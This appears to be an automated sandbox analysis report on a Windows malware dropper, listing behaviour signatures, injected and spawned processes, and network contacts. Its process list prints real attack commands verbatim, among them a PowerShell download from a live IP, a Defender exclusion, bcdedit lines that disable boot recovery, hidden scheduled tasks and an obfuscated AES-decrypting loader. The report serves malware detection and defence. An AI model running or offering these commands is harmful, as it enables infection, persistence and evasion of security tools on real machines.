N/A api.ipify.org N/A N/A

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Users\Admin\AppData\Local\Temp\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\a\victor.exe

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

GoLang User-Agent

Description Indicator Process Target
HTTP User-Agent header Go-http-client/1.1 N/A N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1332 wrote to memory of 3340 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document.exe C:\Users\Admin\AppData\Local\Temp\a\volumeinfo.exe
PID 1332 wrote to memory of 3340 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document.exe C:\Users\Admin\AppData\Local\Temp\a\volumeinfo.exe
PID 1332 wrote to memory of 3340 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document.exe C:\Users\Admin\AppData\Local\Temp\a\volumeinfo.exe
PID 1332 wrote to memory of 4036 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document.exe C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe
PID 1332 wrote to memory of 4036 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document.exe C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe
PID 1332 wrote to memory of 4036 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document.exe C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe
PID 4036 wrote to memory of 5632 N/A C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4036 wrote to memory of 5632 N/A C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4036 wrote to memory of 5632 N/A C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4036 wrote to memory of 5632 N/A C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4036 wrote to memory of 5632 N/A C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4036 wrote to memory of 5632 N/A C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4036 wrote to memory of 5632 N/A C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4036 wrote to memory of 5632 N/A C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4036 wrote to memory of 5632 N/A C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4036 wrote to memory of 5632 N/A C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4036 wrote to memory of 5632 N/A C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4036 wrote to memory of 5632 N/A C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 1332 wrote to memory of 4392 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document.exe C:\Users\Admin\AppData\Local\Temp\a\smartsoftsignew.exe
PID 1332 wrote to memory of 4392 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document.exe C:\Users\Admin\AppData\Local\Temp\a\smartsoftsignew.exe
PID 1332 wrote to memory of 4392 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document.exe C:\Users\Admin\AppData\Local\Temp\a\smartsoftsignew.exe
PID 1332 wrote to memory of 2192 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document.exe C:\Users\Admin\AppData\Local\Temp\a\ADServices.exe
PID 1332 wrote to memory of 2192 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document.exe C:\Users\Admin\AppData\Local\Temp\a\ADServices.exe
PID 4392 wrote to memory of 1912 N/A C:\Users\Admin\AppData\Local\Temp\a\smartsoftsignew.exe C:\Windows\SysWOW64\cmd.exe
PID 4392 wrote to memory of 1912 N/A C:\Users\Admin\AppData\Local\Temp\a\smartsoftsignew.exe C:\Windows\SysWOW64\cmd.exe
PID 4392 wrote to memory of 1912 N/A C:\Users\Admin\AppData\Local\Temp\a\smartsoftsignew.exe C:\Windows\SysWOW64\cmd.exe
PID 1912 wrote to memory of 5396 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1912 wrote to memory of 5396 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1912 wrote to memory of 5396 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1332 wrote to memory of 5488 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document.exe C:\Users\Admin\AppData\Local\Temp\a\New.exe
PID 1332 wrote to memory of 5488 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document.exe C:\Users\Admin\AppData\Local\Temp\a\New.exe
PID 1332 wrote to memory of 5472 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document.exe C:\Users\Admin\AppData\Local\Temp\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe
PID 1332 wrote to memory of 5472 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document.exe C:\Users\Admin\AppData\Local\Temp\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe
PID 1332 wrote to memory of 5472 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document.exe C:\Users\Admin\AppData\Local\Temp\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe
PID 1912 wrote to memory of 5508 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1912 wrote to memory of 5508 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1912 wrote to memory of 4836 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tar.exe
PID 1912 wrote to memory of 4836 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tar.exe
PID 1912 wrote to memory of 4836 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tar.exe
PID 1912 wrote to memory of 5808 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\putty\putty.exe
PID 1912 wrote to memory of 5808 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\putty\putty.exe
PID 5488 wrote to memory of 4488 N/A C:\Users\Admin\AppData\Local\Temp\a\New.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5488 wrote to memory of 4488 N/A C:\Users\Admin\AppData\Local\Temp\a\New.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5488 wrote to memory of 660 N/A C:\Users\Admin\AppData\Local\Temp\a\New.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
PID 5488 wrote to memory of 660 N/A C:\Users\Admin\AppData\Local\Temp\a\New.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
PID 5488 wrote to memory of 660 N/A C:\Users\Admin\AppData\Local\Temp\a\New.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
PID 5488 wrote to memory of 660 N/A C:\Users\Admin\AppData\Local\Temp\a\New.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
PID 5488 wrote to memory of 660 N/A C:\Users\Admin\AppData\Local\Temp\a\New.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
PID 5488 wrote to memory of 660 N/A C:\Users\Admin\AppData\Local\Temp\a\New.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
PID 5488 wrote to memory of 660 N/A C:\Users\Admin\AppData\Local\Temp\a\New.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
PID 5488 wrote to memory of 660 N/A C:\Users\Admin\AppData\Local\Temp\a\New.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
PID 5488 wrote to memory of 4880 N/A C:\Users\Admin\AppData\Local\Temp\a\New.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
PID 5488 wrote to memory of 4880 N/A C:\Users\Admin\AppData\Local\Temp\a\New.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
PID 5488 wrote to memory of 4880 N/A C:\Users\Admin\AppData\Local\Temp\a\New.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
PID 2192 wrote to memory of 6132 N/A C:\Users\Admin\AppData\Local\Temp\a\ADServices.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe
PID 2192 wrote to memory of 6132 N/A C:\Users\Admin\AppData\Local\Temp\a\ADServices.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe
PID 660 wrote to memory of 5756 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe C:\Windows\SysWOW64\cmd.exe
PID 660 wrote to memory of 5756 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe C:\Windows\SysWOW64\cmd.exe
PID 660 wrote to memory of 5756 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe C:\Windows\SysWOW64\cmd.exe
PID 5756 wrote to memory of 5556 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 5756 wrote to memory of 5556 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 5756 wrote to memory of 5556 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 5756 wrote to memory of 3212 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 5756 wrote to memory of 3212 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\shutdownwithoutlogon = "0" C:\Users\Admin\AppData\Local\Temp\a\ld.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\a\New.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\New Text Document.exe

"C:\Users\Admin\AppData\Local\Temp\New Text Document.exe"

C:\Users\Admin\AppData\Local\Temp\a\volumeinfo.exe

"C:\Users\Admin\AppData\Local\Temp\a\volumeinfo.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3404,i,1999448010053300448,1112699187621658374,262144 --variations-seed-version --mojo-platform-channel-handle=3976 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe

"C:\Users\Admin\AppData\Local\Temp\a\Zinker.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\AppData\Local\Temp\a\smartsoftsignew.exe

"C:\Users\Admin\AppData\Local\Temp\a\smartsoftsignew.exe"

C:\Users\Admin\AppData\Local\Temp\a\ADServices.exe

"C:\Users\Admin\AppData\Local\Temp\a\ADServices.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C cd "C:\Users\Admin\AppData\Local\Temp\putty" & "Smartscreen.bat"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object Net.WebClient).DownloadFile('http://94.103.188.126/jerry/putty.zip', 'C:\Users\Admin\AppData\Local\Temp\putty.zip')"

C:\Users\Admin\AppData\Local\Temp\a\New.exe

"C:\Users\Admin\AppData\Local\Temp\a\New.exe"

C:\Users\Admin\AppData\Local\Temp\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe

"C:\Users\Admin\AppData\Local\Temp\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.com/26uSj6

C:\Windows\SysWOW64\tar.exe

tar -xf putty.zip

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --field-trial-handle=4804,i,1999448010053300448,1112699187621658374,262144 --variations-seed-version --mojo-platform-channel-handle=4968 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --field-trial-handle=4964,i,1999448010053300448,1112699187621658374,262144 --variations-seed-version --mojo-platform-channel-handle=5208 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --no-appcompat-clear --field-trial-handle=5448,i,1999448010053300448,1112699187621658374,262144 --variations-seed-version --mojo-platform-channel-handle=5456 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\putty\putty.exe

C:\Users\Admin\AppData\Local\Temp\putty\putty.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --field-trial-handle=5760,i,1999448010053300448,1112699187621658374,262144 --variations-seed-version --mojo-platform-channel-handle=5856 /prefetch:1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\a\New.exe" -Force

C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6012,i,1999448010053300448,1112699187621658374,262144 --variations-seed-version --mojo-platform-channel-handle=6028 /prefetch:8

C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"

C:\Users\Admin\AppData\Local\Temp\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\svchost.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\sxznnh.bat" "

C:\Windows\SysWOW64\cmd.exe

cmd /c "set __=^&rem"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vYb4bUA8Zv1kMxYvRP0sAIjxZQ1BITEGl+5o22oRccc='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7mk7YscC2aINMd/eWv3Jag=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $Xocfa=New-Object System.IO.MemoryStream(,$param_var); $bOZJm=New-Object System.IO.MemoryStream; $ufGxK=New-Object System.IO.Compression.GZipStream($Xocfa, [IO.Compression.CompressionMode]::Decompress); $ufGxK.CopyTo($bOZJm); $ufGxK.Dispose(); $Xocfa.Dispose(); $bOZJm.Dispose(); $bOZJm.ToArray();}function execute_function($param_var,$param2_var){ $yYjBH=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ftLJu=$yYjBH.EntryPoint; $ftLJu.Invoke($null, $param2_var);}$hWrPo = 'C:\Users\Admin\AppData\Local\Temp\sxznnh.bat';$host.UI.RawUI.WindowTitle = $hWrPo;$pJBjW=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($hWrPo).Split([Environment]::NewLine);foreach ($TrzXq in $pJBjW) { if ($TrzXq.StartsWith('qwvMZizsyLxauvnWQoBQ')) { $drGJM=$TrzXq.Substring(20); break; }}$payloads_var=[string[]]$drGJM.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass

C:\Users\Admin\AppData\Local\Temp\a\GTA_V.exe

"C:\Users\Admin\AppData\Local\Temp\a\GTA_V.exe"

C:\Users\Admin\AppData\Local\Temp\is-DOPSM.tmp\GTA_V.tmp

"C:\Users\Admin\AppData\Local\Temp\is-DOPSM.tmp\GTA_V.tmp" /SL5="$202C8,18247052,1148416,C:\Users\Admin\AppData\Local\Temp\a\GTA_V.exe"

C:\Users\Admin\AppData\Local\Temp\a\CapSimple.exe

"C:\Users\Admin\AppData\Local\Temp\a\CapSimple.exe"

C:\Users\Admin\AppData\Local\Temp\a\RambledMimets.exe

"C:\Users\Admin\AppData\Local\Temp\a\RambledMimets.exe"

C:\Users\Admin\AppData\Local\Temp\is-EUNJ3.tmp\7z.exe

"C:\Users\Admin\AppData\Local\Temp\is-EUNJ3.tmp\7z.exe" x C:\Users\Admin\AppData\Local\Temp\is-EUNJ3.tmp\libs.7z -pqwerty0987 -oC:\Users\Admin\AppData\Local\Temp\is-EUNJ3.tmp

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\AppData\Local\Temp\a\ld.exe

"C:\Users\Admin\AppData\Local\Temp\a\ld.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\AppData\Local\Temp\a\volumeinfo.exe

"C:\Users\Admin\AppData\Local\Temp\a\volumeinfo.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\AppData\Local\Temp\a\MSiedge.exe

"C:\Users\Admin\AppData\Local\Temp\a\MSiedge.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c bcdedit /set {current} bootstatuspolicy ignoreallfailures

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c bcdedit /set {current} recoveryenabled no

C:\Windows\system32\bcdedit.exe

bcdedit /set {current} bootstatuspolicy ignoreallfailures

C:\Windows\system32\bcdedit.exe

bcdedit /set {current} recoveryenabled no

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell" Get-MpPreference -verbose

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\sxznnh')

C:\Users\Admin\AppData\Local\Temp\is-EUNJ3.tmp\7z.exe

"C:\Users\Admin\AppData\Local\Temp\is-EUNJ3.tmp\7z.exe" x C:\Users\Admin\AppData\Local\Temp\is-EUNJ3.tmp\IJUP069TW.7z -pqwerty0987 -oC:\Users\Admin\AppData\Local\Temp\is-EUNJ3.tmp\4A6CA328-7888-3279-B672-D1D9D0A46EE2

C:\Users\Admin\AppData\Local\Temp\is-EUNJ3.tmp\7z.exe

"C:\Users\Admin\AppData\Local\Temp\is-EUNJ3.tmp\7z.exe" x C:\Users\Admin\AppData\Local\Temp\is-EUNJ3.tmp\KKUS33HVT.7z -pqwerty0987 -oC:\Users\Admin\AppData\Local\Temp\is-EUNJ3.tmp\4A6CA328-7888-3279-B672-D1D9D0A46EE2

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /c schtasks /create /f /RU "Admin" /tr "C:\ProgramData\OfficeTrackerNMP2663\OfficeTrackerNMP2663.exe" /tn "OfficeTrackerNMP2663 HR" /sc HOURLY /rl HIGHEST

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\ProgramData\OfficeTrackerNMP2663\OfficeTrackerNMP2663.exe" /tn "OfficeTrackerNMP2663 HR" /sc HOURLY /rl HIGHEST

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /c schtasks /create /f /RU "Admin" /tr "C:\ProgramData\OfficeTrackerNMP2663\OfficeTrackerNMP2663.exe" /tn "OfficeTrackerNMP2663 LG" /sc ONLOGON /rl HIGHEST

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\ProgramData\OfficeTrackerNMP2663\OfficeTrackerNMP2663.exe" /tn "OfficeTrackerNMP2663 LG" /sc ONLOGON /rl HIGHEST

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote startup_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\SCV.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force

C:\Users\Admin\AppData\Local\Temp\hqwokv.exe

"C:\Users\Admin\AppData\Local\Temp\hqwokv.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --no-appcompat-clear --field-trial-handle=1840,i,1999448010053300448,1112699187621658374,262144 --variations-seed-version --mojo-platform-channel-handle=6100 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\a\victor.exe

"C:\Users\Admin\AppData\Local\Temp\a\victor.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 736 -ip 736

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 736 -s 232

C:\Users\Admin\AppData\Local\Temp\a\RambledMime.exe

"C:\Users\Admin\AppData\Local\Temp\a\RambledMime.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\AppData\Local\Temp\a\current.exe

"C:\Users\Admin\AppData\Local\Temp\a\current.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\AppData\Local\Temp\a\host_so.exe

"C:\Users\Admin\AppData\Local\Temp\a\host_so.exe"

C:\Users\Admin\AppData\Local\Temp\wegnhw.exe

"C:\Users\Admin\AppData\Local\Temp\wegnhw.exe"

C:\Users\Admin\AppData\Local\Temp\a\mixinte.exe

"C:\Users\Admin\AppData\Local\Temp\a\mixinte.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

C:\Users\Admin\AppData\Local\Temp\a\inte.exe

"C:\Users\Admin\AppData\Local\Temp\a\inte.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

C:\Users\Admin\AppData\Local\Temp\a\winlogon.exe

"C:\Users\Admin\AppData\Local\Temp\a\winlogon.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 urlhaus.abuse.ch udp
US 151.101.2.49:443 urlhaus.abuse.ch tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
RU 147.45.47.70:80 147.45.47.70 tcp
US 8.8.8.8:53 49.2.101.151.in-addr.arpa udp
US 8.8.8.8:53 70.47.45.147.in-addr.arpa udp
CN 124.71.81.174:80 tcp
US 8.8.8.8:53 20.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 f.123654987.xyz udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
DE 49.13.194.118:80 49.13.194.118 tcp
RU 5.42.66.47:80 5.42.66.47 tcp
US 8.8.8.8:53 118.194.13.49.in-addr.arpa udp
US 8.8.8.8:53 47.66.42.5.in-addr.arpa udp
US 8.8.8.8:53 free.360totalsecurity.com udp
NL 151.236.127.172:443 free.360totalsecurity.com tcp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 172.127.236.151.in-addr.arpa udp
US 8.8.8.8:53 softcatalog.ru udp
RU 88.212.252.98:443 softcatalog.ru tcp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 98.252.212.88.in-addr.arpa udp
US 8.8.8.8:53 st.p.360safe.com udp
US 8.8.8.8:53 s.360safe.com udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 tr.p.360safe.com udp
US 8.8.8.8:53 iup.360safe.com udp
DE 52.29.179.141:80 s.360safe.com tcp
MD 94.103.188.126:80 94.103.188.126 tcp
IE 54.76.174.118:80 tr.p.360safe.com udp
NL 151.236.127.172:80 iup.360safe.com tcp
NL 151.236.127.172:80 iup.360safe.com tcp
NL 151.236.127.172:80 iup.360safe.com tcp
NL 151.236.127.172:80 iup.360safe.com tcp
NL 151.236.127.172:80 iup.360safe.com tcp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 141.179.29.52.in-addr.arpa udp
US 8.8.8.8:53 118.174.76.54.in-addr.arpa udp
US 8.8.8.8:53 126.188.103.94.in-addr.arpa udp
DE 52.29.179.141:80 s.360safe.com tcp
US 8.8.8.8:53 int.down.360safe.com udp
IE 54.77.42.29:3478 st.p.360safe.com udp
IE 54.77.42.29:3478 st.p.360safe.com udp
US 8.8.8.8:53 iplogger.com udp
US 8.8.8.8:53 iplogger.com udp
US 172.67.188.178:443 iplogger.com udp
US 8.8.8.8:53 iplogger.com udp
US 8.8.8.8:53 business.bing.com udp
US 8.8.8.8:53 business.bing.com udp
US 13.107.6.158:443 business.bing.com tcp
US 8.8.8.8:53 29.42.77.54.in-addr.arpa udp
US 8.8.8.8:53 178.188.67.172.in-addr.arpa udp
US 104.192.108.21:80 int.down.360safe.com tcp
US 8.8.8.8:53 www.google.com udp
US 104.192.108.17:80 int.down.360safe.com tcp
US 104.192.108.20:80 int.down.360safe.com tcp
